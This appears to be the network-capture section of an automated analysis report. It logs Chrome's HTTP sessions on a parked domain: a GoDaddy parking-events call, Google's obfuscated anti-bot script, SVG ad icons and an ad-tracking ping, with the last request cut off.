                                                                          2024-08-29 15:12:26 UTC531INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:26 GMT
                                                                          Content-Type: text/plain
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          Set-Cookie: AWSALB=B8ow0wf5x4A1hNTfvLGiYW/tCHNg7hFzyF8d4CpzoiCh2ePZQCesSduTSdZXOVbM7pGXx4pEOWXYePx6HUL9VEc+NhFThKocrEXHfDBKvfi6AExIDkbn32QF5p0h; Expires=Thu, 05 Sep 2024 15:12:26 GMT; Path=/
                                                                          Set-Cookie: AWSALBCORS=B8ow0wf5x4A1hNTfvLGiYW/tCHNg7hFzyF8d4CpzoiCh2ePZQCesSduTSdZXOVbM7pGXx4pEOWXYePx6HUL9VEc+NhFThKocrEXHfDBKvfi6AExIDkbn32QF5p0h; Expires=Thu, 05 Sep 2024 15:12:26 GMT; Path=/; SameSite=None; Secure


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          33192.168.2.553796142.250.186.684434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:26 UTC487OUTGET /js/bg/qfimbA0GYhgyETKN2gHT05d-Hpg6wiB8plDJ1aMSf3s.js HTTP/1.1
                                                                          Host: www.google.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:27 UTC807INHTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="botguard-scs"
                                                                          Report-To: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]}
                                                                          Content-Length: 54789
                                                                          X-Content-Type-Options: nosniff
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Date: Thu, 29 Aug 2024 15:12:25 GMT
                                                                          Expires: Fri, 29 Aug 2025 15:12:25 GMT
                                                                          Cache-Control: public, max-age=31536000
                                                                          Last-Modified: Wed, 21 Aug 2024 13:30:00 GMT
                                                                          Content-Type: text/javascript
                                                                          Vary: Accept-Encoding
                                                                          Age: 1
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-08-29 15:12:27 UTC583INData Raw: 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 64 61 74 61 3a 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3b 62 61 73 65 36 34 2c 65 79 4a 32 5a 58 4a 7a 61 57 39 75 49 6a 6f 67 4d 79 77 69 63 32 39 31 63 6d 4e 6c 63 79 49 36 57 79 49 69 58 53 77 69 63 32 39 31 63 6d 4e 6c 63 30 4e 76 62 6e 52 6c 62 6e 51 69 4f 6c 73 69 49 43 4a 64 4c 43 4a 75 59 57 31 6c 63 79 49 36 57 79 4a 6a 62 47 39 7a 64 58 4a 6c 52 48 6c 75 59 57 31 70 59 30 4a 31 64 48 52 76 62 69 4a 64 4c 43 4a 74 59 58 42 77 61 57 35 6e 63 79 49 36 49 6b 46 42 51 55 45 37 51 55 46 42 51 54 74 42 51 55 46 42 4f 30 46 42 51 55 45 37 51 55 46 42 51 54 74 42 51 55 46 42 4f 30 46 42 51 55 45 69 66 51 3d 3d 0a 28 66 75 6e 63 74 69 6f 6e 28
                                                                          Data Ascii: //# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==(function(
                                                                          2024-08-29 15:12:27 UTC1390INData Raw: 73 74 65 64 54 79 70 65 73 2c 7a 3d 32 31 3b 65 6c 73 65 20 69 66 28 7a 3d 3d 33 38 29 56 2e 63 6f 6e 73 6f 6c 65 5b 59 5d 28 4c 2e 6d 65 73 73 61 67 65 29 2c 7a 3d 52 3b 65 6c 73 65 20 69 66 28 7a 3d 3d 31 35 29 72 65 74 75 72 6e 20 51 7d 7d 63 61 74 63 68 28 57 29 7b 69 66 28 62 3d 3d 6e 29 74 68 72 6f 77 20 57 3b 62 3d 3d 36 35 26 26 28 4c 3d 57 2c 7a 3d 76 29 7d 7d 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 52 29 7b 72 65 74 75 72 6e 20 66 2e 63 61 6c 6c 28 74 68 69 73 2c 52 29 7d 2c 56 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 28 30 2c 65 76 61 6c 29 28 66 75 6e 63 74 69 6f 6e 28 52 2c 76 29 7b 72 65 74 75 72 6e 28 76 3d 47 28 39 35 2c 39 36 2c 34 31 2c 33 35 2c 22 65 72 72 6f 72 22 2c 22 62 67 22 2c 6e 75 6c 6c 29 29 26 26 52 2e 65 76 61 6c 28 76 2e 63 72 65 61
                                                                          Data Ascii: stedTypes,z=21;else if(z==38)V.console[Y](L.message),z=R;else if(z==15)return Q}}catch(W){if(b==n)throw W;b==65&&(L=W,z=v)}},w=function(R){return f.call(this,R)},V=this||self;(0,eval)(function(R,v){return(v=G(95,96,41,35,"error","bg",null))&&R.eval(v.crea
                                                                          2024-08-29 15:12:27 UTC1390INData Raw: 62 29 2c 4c 3d 36 32 3b 65 6c 73 65 20 69 66 28 4c 3d 3d 38 30 29 4c 3d 28 6e 7c 39 29 3e 3e 34 3c 32 26 26 28 28 6e 5e 36 38 29 26 31 34 29 3e 3d 38 3f 33 38 3a 39 35 3b 65 6c 73 65 20 69 66 28 4c 3d 3d 37 30 29 64 65 6c 65 74 65 20 52 2e 73 5b 42 5d 2c 52 2e 7a 50 2d 2d 2c 4c 3d 39 35 3b 65 6c 73 65 7b 69 66 28 4c 3d 3d 39 36 29 72 65 74 75 72 6e 20 76 3b 4c 3d 3d 31 35 26 26 28 4c 3d 28 6e 26 31 30 30 29 3d 3d 6e 3f 37 34 3a 36 35 29 7d 7d 2c 6e 44 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 6e 2c 62 2c 52 2c 42 2c 51 2c 77 29 7b 66 6f 72 28 51 3d 35 38 3b 51 21 3d 31 37 3b 29 69 66 28 51 3d 3d 35 34 29 74 68 69 73 2e 73 72 63 3d 62 2c 74 68 69 73 2e 73 3d 7b 7d 2c 74 68 69 73 2e 7a 50 3d 30 2c 51 3d 37 3b 65 6c 73 65 20 69 66 28 51 3d 3d 33 29 51 3d 6e 2b 37
                                                                          Data Ascii: b),L=62;else if(L==80)L=(n|9)>>4<2&&((n^68)&14)>=8?38:95;else if(L==70)delete R.s[B],R.zP--,L=95;else{if(L==96)return v;L==15&&(L=(n&100)==n?74:65)}},nD=function(z,n,b,R,B,Q,w){for(Q=58;Q!=17;)if(Q==54)this.src=b,this.s={},this.zP=0,Q=7;else if(Q==3)Q=n+7
                                                                          2024-08-29 15:12:27 UTC1390INData Raw: 66 20 6e 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 42 3d 6e 3a 28 6e 5b 66 44 5d 7c 7c 28 6e 5b 66 44 5d 3d 66 75 6e 63 74 69 6f 6e 28 77 29 7b 72 65 74 75 72 6e 20 6e 2e 68 61 6e 64 6c 65 45 76 65 6e 74 28 77 29 7d 29 2c 42 3d 6e 5b 66 44 5d 29 2c 51 3d 7a 29 7d 7d 2c 44 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 6e 2c 62 2c 52 2c 42 2c 51 29 7b 66 6f 72 28 51 3d 36 37 3b 51 21 3d 33 38 3b 29 69 66 28 51 3d 3d 32 29 41 28 52 2c 6e 2c 62 29 2c 62 5b 56 4a 5d 3d 32 37 39 36 2c 51 3d 32 35 3b 65 6c 73 65 20 69 66 28 51 3d 3d 34 35 29 74 68 69 73 5b 74 68 69 73 2b 22 22 5d 3d 74 68 69 73 2c 51 3d 35 37 3b 65 6c 73 65 20 69 66 28 51 3d 3d 31 30 29 51 3d 28 7a 26 31 32 32 29 3d 3d 7a 3f 37 35 3a 32 33 3b 65 6c 73 65 20 69 66 28 51 3d 3d 32 35 29 51 3d 28 7a 2b 33 26
                                                                          Data Ascii: f n==="function"?B=n:(n[fD]||(n[fD]=function(w){return n.handleEvent(w)}),B=n[fD]),Q=z)}},D=function(z,n,b,R,B,Q){for(Q=67;Q!=38;)if(Q==2)A(R,n,b),b[VJ]=2796,Q=25;else if(Q==45)this[this+""]=this,Q=57;else if(Q==10)Q=(z&122)==z?75:23;else if(Q==25)Q=(z+3&
                                                                          2024-08-29 15:12:27 UTC1390INData Raw: 74 65 6e 65 72 28 77 29 2c 77 35 2d 2d 2c 51 3d 58 28 36 2c 42 29 2c 4c 3d 32 37 3b 65 6c 73 65 20 69 66 28 4c 3d 3d 33 30 29 74 68 69 73 5b 74 68 69 73 2b 22 22 5d 3d 74 68 69 73 2c 4c 3d 31 34 3b 65 6c 73 65 7b 69 66 28 4c 3d 3d 31 34 29 72 65 74 75 72 6e 20 76 3b 4c 3d 3d 31 30 3f 4c 3d 38 30 3a 4c 3d 3d 35 31 3f 28 69 51 28 39 36 2c 74 72 75 65 2c 31 33 2c 52 29 2c 4c 3d 34 31 29 3a 4c 3d 3d 39 39 3f 4c 3d 42 26 26 42 5b 67 35 5d 3f 34 34 3a 34 32 3a 4c 3d 3d 35 30 3f 4c 3d 7a 3e 3e 31 26 37 3f 33 33 3a 39 30 3a 4c 3d 3d 38 30 3f 4c 3d 28 7a 2b 32 5e 31 35 29 3e 3d 7a 26 26 28 7a 2b 34 5e 33 31 29 3c 7a 3f 36 33 3a 34 31 3a 4c 3d 3d 32 37 26 26 28 4c 3d 51 3f 36 34 3a 35 31 29 7d 7d 2c 6c 51 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 6e 2c 62 2c 52 2c 42 2c
                                                                          Data Ascii: tener(w),w5--,Q=X(6,B),L=27;else if(L==30)this[this+""]=this,L=14;else{if(L==14)return v;L==10?L=80:L==51?(iQ(96,true,13,R),L=41):L==99?L=B&&B[g5]?44:42:L==50?L=z>>1&7?33:90:L==80?L=(z+2^15)>=z&&(z+4^31)<z?63:41:L==27&&(L=Q?64:51)}},lQ=function(z,n,b,R,B,
                                                                          2024-08-29 15:12:27 UTC1390INData Raw: 2e 6c 65 6e 67 74 68 3c 35 30 3f 36 37 3a 32 39 3b 65 6c 73 65 20 69 66 28 56 3d 3d 36 37 29 74 68 69 73 2e 53 2e 70 75 73 68 28 62 29 2c 56 3d 34 38 3b 65 6c 73 65 20 69 66 28 56 3d 3d 32 39 29 52 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 74 68 69 73 2e 6e 29 2c 52 3c 35 30 26 26 28 74 68 69 73 2e 53 5b 52 5d 3d 62 29 2c 56 3d 34 38 3b 65 6c 73 65 20 69 66 28 56 3d 3d 37 38 29 56 3d 42 26 26 42 2e 6f 6e 63 65 3f 34 37 3a 32 36 3b 65 6c 73 65 20 69 66 28 56 3d 3d 32 37 29 56 3d 36 35 3b 65 6c 73 65 20 69 66 28 56 3d 3d 36 35 29 56 3d 28 28 6e 5e 39 34 29 26 37 29 3d 3d 33 3f 31 36 3a 34 38 3b 65 6c 73 65 20 69 66 28 56 3d 3d 32 36 29 56 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 4c 29 3f 37 36 3a 38 33 3b 65 6c 73 65
                                                                          Data Ascii: .length<50?67:29;else if(V==67)this.S.push(b),V=48;else if(V==29)R=Math.floor(Math.random()*this.n),R<50&&(this.S[R]=b),V=48;else if(V==78)V=B&&B.once?47:26;else if(V==27)V=65;else if(V==65)V=((n^94)&7)==3?16:48;else if(V==26)V=Array.isArray(L)?76:83;else
                                                                          2024-08-29 15:12:27 UTC1390INData Raw: 38 7c 31 38 29 3e 3d 6e 29 7b 66 6f 72 28 42 3d 28 51 3d 6d 28 62 2c 32 38 29 2c 30 29 3b 52 3e 30 3b 52 2d 2d 29 42 3d 42 3c 3c 7a 7c 76 6f 28 33 30 36 2c 62 2c 74 72 75 65 29 3b 41 28 62 2c 51 2c 42 29 7d 72 65 74 75 72 6e 28 6e 26 32 38 29 3d 3d 6e 26 26 28 7a 2e 47 3f 77 3d 78 4e 28 7a 2c 7a 2e 4f 29 3a 28 62 3d 55 38 28 33 30 36 2c 7a 2c 74 72 75 65 2c 38 29 2c 2d 31 32 38 2d 32 2a 7e 28 62 26 31 32 38 29 2b 2d 32 2b 28 7e 62 26 31 32 38 29 26 26 28 62 5e 3d 31 32 38 2c 52 3d 55 38 28 33 30 36 2c 7a 2c 74 72 75 65 2c 32 29 2c 62 3d 28 62 3c 3c 32 29 2b 28 52 7c 30 29 29 2c 77 3d 62 29 29 2c 77 7d 2c 58 32 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 6e 2c 62 2c 52 2c 42 2c 51 2c 77 2c 57 2c 4c 2c 76 2c 66 2c 56 29 7b 66 6f 72 28 56 3d 35 38 3b 56 21 3d 33 36
                                                                          Data Ascii: 8|18)>=n){for(B=(Q=m(b,28),0);R>0;R--)B=B<<z|vo(306,b,true);A(b,Q,B)}return(n&28)==n&&(z.G?w=xN(z,z.O):(b=U8(306,z,true,8),-128-2*~(b&128)+-2+(~b&128)&&(b^=128,R=U8(306,z,true,2),b=(b<<2)+(R|0)),w=b)),w},X2=function(z,n,b,R,B,Q,w,W,L,v,f,V){for(V=58;V!=36
                                                                          2024-08-29 15:12:27 UTC1390INData Raw: 29 3f 21 21 51 2e 63 61 70 74 75 72 65 3a 21 21 51 2c 57 3d 69 51 28 39 36 2c 57 2c 38 29 2c 67 3d 35 35 29 3a 67 3d 3d 30 3f 67 3d 56 3c 42 2e 6c 65 6e 67 74 68 3f 33 37 3a 34 32 3a 67 3d 3d 35 30 3f 67 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 42 29 3f 33 30 3a 35 38 3a 67 3d 3d 34 33 3f 67 3d 33 31 3a 67 3d 3d 34 35 3f 67 3d 35 32 3a 67 3d 3d 37 37 3f 28 77 2e 69 2e 72 65 6d 6f 76 65 28 53 74 72 69 6e 67 28 42 29 2c 57 2c 4c 2c 52 29 2c 67 3d 34 32 29 3a 67 3d 3d 36 37 3f 67 3d 28 7a 7c 35 36 29 3d 3d 7a 3f 36 36 3a 33 35 3a 67 3d 3d 37 31 3f 28 28 76 3d 66 2e 51 6f 28 42 2c 4c 2c 52 2c 57 29 29 26 26 4f 28 31 34 2c 22 6f 6e 22 2c 30 2c 76 29 2c 67 3d 34 32 29 3a 67 3d 3d 34 32 3f 67 3d 28 7a 7c 37 32 29 3d 3d 7a 3f 33 3a 34 3a 67 3d 3d 35 32 3f 67
                                                                          Data Ascii: )?!!Q.capture:!!Q,W=iQ(96,W,8),g=55):g==0?g=V<B.length?37:42:g==50?g=Array.isArray(B)?30:58:g==43?g=31:g==45?g=52:g==77?(w.i.remove(String(B),W,L,R),g=42):g==67?g=(z|56)==z?66:35:g==71?((v=f.Qo(B,L,R,W))&&O(14,"on",0,v),g=42):g==42?g=(z|72)==z?3:4:g==52?g
                                                                          2024-08-29 15:12:27 UTC1390INData Raw: 29 59 3d 6e 2e 42 3d 3d 6e 3f 38 35 3a 32 35 3b 65 6c 73 65 20 69 66 28 59 3d 3d 32 34 29 6c 3d 53 45 28 6e 2c 36 2c 32 35 2c 70 29 2c 59 3d 34 34 3b 65 6c 73 65 20 69 66 28 59 3d 3d 7a 29 4c 26 26 76 26 26 4c 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 76 2c 66 2c 61 72 29 2c 59 3d 32 35 3b 65 6c 73 65 20 69 66 28 59 3d 3d 32 30 29 7b 76 61 72 20 67 3d 21 6e 2e 67 2e 6c 65 6e 67 74 68 3b 59 3d 28 28 5a 28 35 37 2c 30 2c 6e 2c 70 29 2c 67 29 26 26 46 28 38 34 2c 32 35 34 2c 42 2c 6e 2c 42 29 2c 34 34 29 7d 65 6c 73 65 20 69 66 28 59 3d 3d 36 39 29 59 3d 57 3d 3d 32 3f 31 3a 38 33 3b 65 6c 73 65 20 69 66 28 59 3d 3d 36 29 76 61 72 20 70 3d 28 59 3d 36 39 2c 5b 6d 30 2c 77 2c 52 2c 76 6f 69 64 20 30 2c 4c 2c 76 2c 61 72 67 75 6d 65 6e 74
                                                                          Data Ascii: )Y=n.B==n?85:25;else if(Y==24)l=SE(n,6,25,p),Y=44;else if(Y==z)L&&v&&L.removeEventListener(v,f,ar),Y=25;else if(Y==20){var g=!n.g.length;Y=((Z(57,0,n,p),g)&&F(84,254,B,n,B),44)}else if(Y==69)Y=W==2?1:83;else if(Y==6)var p=(Y=69,[m0,w,R,void 0,L,v,argument
                                                                          2024-08-29 15:12:27 UTC1390INData Raw: 75 6e 63 74 69 6f 6e 22 3f 51 2e 64 6c 28 29 3a 6e 65 77 20 51 3a 6e 75 6c 6c 2c 76 3d 35 37 29 3a 76 3d 3d 38 31 3f 28 42 3d 69 51 28 39 36 2c 42 2c 31 30 29 2c 52 26 26 52 5b 67 35 5d 3f 52 2e 69 2e 61 64 64 28 53 74 72 69 6e 67 28 57 29 2c 42 2c 62 2c 49 28 35 36 2c 6e 75 6c 6c 2c 77 29 3f 21 21 77 2e 63 61 70 74 75 72 65 3a 21 21 77 2c 51 29 3a 72 35 28 31 38 2c 6e 75 6c 6c 2c 66 61 6c 73 65 2c 57 2c 77 2c 42 2c 62 2c 52 2c 51 29 2c 76 3d 34 29 3a 76 3d 3d 33 39 3f 28 4c 2b 2b 2c 76 3d 39 30 29 3a 76 3d 3d 37 34 3f 28 62 28 66 75 6e 63 74 69 6f 6e 28 56 29 7b 56 28 6e 29 7d 29 2c 66 3d 5b 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 5d 2c 76 3d 34 35 29 3a 76 3d 3d 38 38 3f 76 3d 7a 2b 39 3e 3e 33
                                                                          Data Ascii: unction"?Q.dl():new Q:null,v=57):v==81?(B=iQ(96,B,10),R&&R[g5]?R.i.add(String(W),B,b,I(56,null,w)?!!w.capture:!!w,Q):r5(18,null,false,W,w,B,b,R,Q),v=4):v==39?(L++,v=90):v==74?(b(function(V){V(n)}),f=[function(){return n},function(){}],v=45):v==88?v=z+9>>3


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          34192.168.2.553794142.250.184.1934434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:26 UTC508OUTGET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21 HTTP/1.1
                                                                          Host: afs.googleusercontent.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:27 UTC796INHTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Content-Security-Policy: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/afs-native-asset-managers
                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="afs-native-asset-managers"
                                                                          Report-To: {"group":"afs-native-asset-managers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/afs-native-asset-managers"}]}
                                                                          Content-Length: 200
                                                                          X-Content-Type-Options: nosniff
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Date: Thu, 29 Aug 2024 15:12:23 GMT
                                                                          Expires: Fri, 30 Aug 2024 14:12:23 GMT
                                                                          Cache-Control: public, max-age=82800
                                                                          Age: 3
                                                                          Last-Modified: Thu, 02 Nov 2023 22:48:00 GMT
                                                                          Content-Type: image/svg+xml
                                                                          Vary: Accept-Encoding
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-08-29 15:12:27 UTC200INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 27 23 30 66 31 63 32 31 27 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 77 69 64 74 68 3d 22 32 34 22 3e 3c 70 61 74 68 20 64 3d 22 4d 30 20 30 68 32 34 76 32 34 48 30 7a 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 35 2e 38 38 20 34 2e 31 32 4c 31 33 2e 37 36 20 31 32 6c 2d 37 2e 38 38 20 37 2e 38 38 4c 38 20 32 32 6c 31 30 2d 31 30 4c 38 20 32 7a 22 2f 3e 3c 2f 73 76 67 3e
                                                                          Data Ascii: <svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><path d="M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z"/></svg>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          35192.168.2.553795142.250.184.1934434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:26 UTC507OUTGET /ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21 HTTP/1.1
                                                                          Host: afs.googleusercontent.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:27 UTC796INHTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Content-Security-Policy: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/afs-native-asset-managers
                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="afs-native-asset-managers"
                                                                          Report-To: {"group":"afs-native-asset-managers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/afs-native-asset-managers"}]}
                                                                          Content-Length: 391
                                                                          X-Content-Type-Options: nosniff
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Date: Thu, 29 Aug 2024 15:12:23 GMT
                                                                          Expires: Fri, 30 Aug 2024 14:12:23 GMT
                                                                          Cache-Control: public, max-age=82800
                                                                          Last-Modified: Thu, 20 Jul 2023 22:48:00 GMT
                                                                          Content-Type: image/svg+xml
                                                                          Vary: Accept-Encoding
                                                                          Age: 3
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-08-29 15:12:27 UTC391INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 27 23 30 66 31 63 32 31 27 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 30 30 22 20 68 65 69 67 68 74 3d 22 32 30 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 2e 35 20 31 34 68 2d 2e 37 39 6c 2d 2e 32 38 2d 2e 32 37 43 31 35 2e 34 31 20 31 32 2e 35 39 20 31 36 20 31 31 2e 31 31 20 31 36 20 39 2e 35 20 31 36 20 35 2e 39 31 20 31 33 2e 30 39 20 33 20 39 2e 35 20 33 53 33 20 35 2e 39 31 20 33 20 39 2e 35 20 35 2e 39 31 20 31 36 20 39 2e 35 20 31 36 63 31 2e 36 31 20 30 20 33 2e 30 39 2d 2e 35 39 20 34 2e 32 33 2d 31 2e 35 37 6c 2e 32 37 2e 32 38 76 2e 37 39 6c 35 20 34 2e 39 39 4c
                                                                          Data Ascii: <svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          36192.168.2.55379854.174.215.774434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:27 UTC710OUTGET /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1
                                                                          Host: api.aws.parking.godaddy.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: AWSALB=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; AWSALBCORS=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; cpvisitor=f491361e-23b1-46ad-b955-49e64997c4da
                                                                          2024-08-29 15:12:27 UTC531INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:27 GMT
                                                                          Content-Type: text/plain
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          Set-Cookie: AWSALB=tQ6UsCCaQyQQAy5Mxg72Esvozbvkh5+V9QRlxqa5z0iXY2YjKXkHeskDnm1yKoNvUXI69MQ1x5UF04KCj0ONTU8d55kzGb6fcupL4Cryb2nndIRUjc1mDMqMKht9; Expires=Thu, 05 Sep 2024 15:12:27 GMT; Path=/
                                                                          Set-Cookie: AWSALBCORS=tQ6UsCCaQyQQAy5Mxg72Esvozbvkh5+V9QRlxqa5z0iXY2YjKXkHeskDnm1yKoNvUXI69MQ1x5UF04KCj0ONTU8d55kzGb6fcupL4Cryb2nndIRUjc1mDMqMKht9; Expires=Thu, 05 Sep 2024 15:12:27 GMT; Path=/; SameSite=None; Secure


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          37192.168.2.553800172.217.16.2064434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:28 UTC883OUTGET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=g3yhpaijmirq&aqid=1o_QZoOUFf6kjuwPko2JoA0&psid=7621175430&pbt=bs&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=11%7C0%7C1627%7C1343%7C1527&lle=0&ifv=1&hpt=0 HTTP/1.1
                                                                          Host: syndicatedsearch.goog
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
